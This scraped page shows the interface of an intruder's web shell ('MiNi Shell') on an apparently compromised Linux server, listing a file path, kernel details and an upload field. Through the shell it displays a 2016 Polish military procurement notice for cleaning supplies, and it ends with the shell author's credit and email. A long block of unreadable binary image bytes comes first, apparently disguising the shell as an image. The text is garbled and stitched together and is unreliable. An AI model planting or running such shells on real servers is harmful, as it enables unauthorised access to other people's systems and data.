JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160505/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160505/112220-N-2016.html

<p class="kh_header"><b>Zgierz: Dostawa środków czystości i higieny, artykułów przemysłowych do utrzymania czystości oraz środków do higienizacji bloku żywnościowego</b><br>
<b>Numer ogłoszenia: 112220 - 2016; data zamieszczenia: 05.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 31 Wojskowy Oddział Gospodarczy , ul. Konstantynowska 85, 95-100 Zgierz, woj. łódzkie, tel. 261 442 098, faks 261 442 101.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków czystości i higieny, artykułów przemysłowych do utrzymania czystości oraz środków do higienizacji bloku żywnościowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa środków czystości i higieny, artykułów przemysłowych do utrzymania czystości oraz środków do higienizacji bloku żywnościowego.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.71.19.00-6, 33.74.10.00-6, 33.74.11.00-7, 24.45.50.00-8, 39.83.00.00-9, 19.64.00.00-4, 18.42.40.00-7, 39.51.42.00-0, 39.22.43.00-1, 33.76.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunki za spełnione na podstawie oświadczenia w trybie art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunki za spełnione na podstawie oświadczenia w trybie art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunki za spełnione na podstawie oświadczenia w trybie art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunki za spełnione na podstawie oświadczenia w trybie art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunki za spełnione na podstawie oświadczenia w trybie art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin dostawy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.31wog.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 31 Wojskowy Oddział Gospodarczy 95-100 Zgierz ul. Konstantynowska 85 bud. 3 pok. 5-6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2016 godzina 10:00, miejsce: 31 Wojskowy Oddział Gospodarczy 95-100 Zgierz ul. Konstantynowska 85 bud. 2 pok. 114-115 (Kancelaria jawna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> sposób porozumiewania się fax nr 261 442 101.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - środki higieny i czystości (Sł. Mundurowa).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mydło toaletowe 	10 000
Krem ochronny do rąk 50 ml	2 500
Pasta BHP ze ścierniwem 	500
Mydło toaletowe dezynfekcyjne 	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.71.19.00-6, 39.81.20.00-7, 33.77.41.10-7, 33.65.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - środki czystości oraz artykuły przemysłowe związane z utrzymaniem czystości w obiektach (Infrastruktura),.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Papier toaletowy 	szt.	3200
2	Mydło w płynie - dezynfekujące, 	l.	65
3	Zagęszczony płyn do czyszczenia, dezynfekcji i wybielania pomieszczeń sanitarnych 	szt.	310
4	Uniwersalne mleczko do czyszczenia z mikrogranulkami  	op.	10
5	Worki na odpady LDPE 60 l 	op.	700
6	Worki na odpady LDPE 120 l. 	op.	250
7	Worki na odpady LDPE 240 l. 	op.	200
8	Worki na odpady medyczne ze ściągaczem  poj. 35 l. 	op.	30
9	Worki na odpady medyczne ze ściągaczem  poj. 60 l. 	op.	30
10	Ścierka wielokrotnego użytku 	szt.	100
11	Trwała ścierka wykonana z wysokiej jakości syntetycznych mikrowłókien. 	szt.	30
12	Rękawice gumowe, lateksowe flokowane gospodarcze kolor żółty rozmiar  XL	para	100
13	Odświeżacz powietrza w areozolu.	szt.	50
14	Kostka do WC (koszyk+ zapas)	szt.	400
15	Worek do odkurzacza Karcher T 15/1	szt.	10
16	Granulat do udrażniania rur	szt.	100
17	Płyn uniwersalny do mycia podłóg,ścian i glazury,	szt.	300
18	Ręcznik papierowy 100% celuloza ZZ, 	bind	500
19	Ręczniki papierowe w rolce, 	rol.	736
20	Środek do czyszczenia mebli w sprayu  	szt.	70
21	Koncentrat aktywnego środka czyszczącego do wysokociśnieniowego mycia w myjkach ciśnieniowych KARCHER, 	l	70
22	Płynny środek zmiękczający do wody  do myjek HDS KARCHER 	l	70
23	Auto szampon do myjki KARCHER 	l	70
24	Środek czyszczący alkaliczny  do podłóg i posadzek przemysłowych. 	szt.	130
25	Preparat typu Forlux PG 514 lub równoważny przeznaczony do gruntownego mycia powierzchni maszyna szorującą, odpornych na środki zasadowe oraz do mycia ręcznego -mopem. 	op.	30
26	Alkaiczny środek czyszczący do rozpuszczania najbardziej intensywnych zabrudzeń przemysłowych 	op	20
27	Uniwersalny środek czyszczący do elektroniki optyki, głowic magnetycznych itp., bezpieczny dla tworzyw sztucznych, oraz gumy, szybko odparowuje, nie pozostawia żadnych śladów, 	l.	5
28	Płyn do mycia szyb i luster 	op.	10
29	Płyn do mycia szkła laboratoryjnego, 	l.	2
30	Mop płaski z trzonkiem kompatybilny z zapasem 40 cm, uszy/kieszenie -niebieskie, materiał-mikrofibra	szt.	120
31	Uchwyt na papier toaletowy, ścienny, 	kpl.	50
32	Uchwyt na papier z klapką ścienny, 	kpl.	40
33	Szufelka z tworzywa 	kpl.	70
34	Mop płaski  zestaw  - mop z kijem teleskopowy z regulacją długości+nakładka + kompletne wiadro z wyciskaczem, bezdotykowy system wyciskania mopa 	kpl.	100
35	Wiadro plastikowe  	kpl.	10
36	Zamiatacz domowy (szczotka) w oprawie drewnianej do zamiatania na kij, długość szczotki min.40-45 cm., szerokość minimum 5 cm, min. 6 rzędów włosia, włos miwszany, Ilość otworów min. 120 wysokość części pracującej min. 6 cm. Gniazdo do oprawienia	szt.	150
37	Zmiotka w oprawie.	szt.	20
38	Szufelka - śmitniczka 	szt.	20
39	Kij uniwersalny drewniany 120 cm  gwint standardowy fi. 22, lakierowany bez sęków	szt.	200
40	Wycieraczka do butów 	szt.	20
41	Trwała wycieraczka-	szt.	75
42	Wycieraczka gumowa 	szt.	31
43	Profesjonalna wycieraczka   mata wejsciowa do wewnątrz pomieszczeń, 	szt.	18
44	Wycieraczka gumowa 100x150 cm, 	szt.	26
45	Szczoteczki do wycieraczki plaster miodu średnica 27 mm, całkowita wysokość 20 mm wysokość włosa 12 mm, kolor czarny 	szt.	30
46	Szczoteczki do wycieraczki plaster miodu średnica 27 mm, całkowita wysokość 20 mm wysokość włosa 12 mm, kolor szary	szt.	30
47	Szczoteczki do wycieraczki plaster miodu średnica 27 mm, całkowita wysokość 20 mm wysokość włosa 12 mm, kolor zelony	szt.	30
48	Zasłona prysznicowa, 	szt.	60
49	Uliczna miotła z kijem 	szt.	20
50	Szczotka uliczna 	szt.	30
51	Antypoślizgowa mata do brodzika  	szt.	15
52	Dozownik do mydła w płynie o poj. 500 ml,	szt.	75
53	Wózek do sprzątania jednowiaderkowy a25 l. z wyciskarką do mopa, 	szt.	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 33.71.19.00-6, 24.45.50.00-8, 19.64.00.00-4, 18.42.40.00-7, 39.51.42.00-0, 39.22.43.00-1, 33.76.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - środki do higienizacji obiektów bloku żywnościowego (Sł. Żywnościowa),.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Środek do dezynfekcji posadzek	litr	1300
			
2	Płyn do odkamieniania	litr	350
			
			
3	Środek do usuwania przypaleń	litr	350
		
4	Środek do czyszczenia stali nierdzewnej	litr	150
		
5	Nabłyszczacz do zmywarek	litr	200
			
6	Płyn do maszynowego mycia naczyń	litr	3500
	
7	Płyn do mycia i dezynfekcji zaplecza kuchennego	litr	400
		
8	Środek do czyszczenia urządzeń chłodniczych	litr	300
			
		
9	Mleczko do czyszczenia	litr	200
		
10	Płyn do mycia naczyń w opak. 0,5 litra	litr	350
			
		
11	Płyn do mycia naczyń 	litr	3000
		
12	Sól do zmiękczania wody	kg	200
		
			
13	Druciak kuchenny nierdzewny spiralny	szt.	2500
		
14	Zmywak - gąbka do naczyń	opak.	1000
		
15	Torebki HDPE a`1000 szt.	opak.	300
			
16	Reklamówka HDPE 24x45cm a`200 szt.	opak.	500
		
17	Torba krzyżowa papierowa poj. 1kg z atestem	kg	100
18	Szczotka okrągła	szt.	100
19	Szczotka do blatów	szt.	100
			
	
20	Opakowanie styropianowe	szt.	1000
21	Kubki styropianowe	szt.	1000
22	Papier śniadaniowy biały	opak.	1500
23	Torebki śniadaniowe papierowe	szt.	1500
			
			
24	Rękawiczki foliowe a`100 szt.	opak.	50
25	Serwetki gastronomiczne białe	opak.	300
			
		
26	Serwetki ozdobne 	opak.	200
			
			
			
27	Rękaw do pieczenia	szt.	40
			
			
28	Folia gastronomiczna stretch	rolka	20
			
			
			
29	Worki do pakowarki próżniowej A100szt. 	opak.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com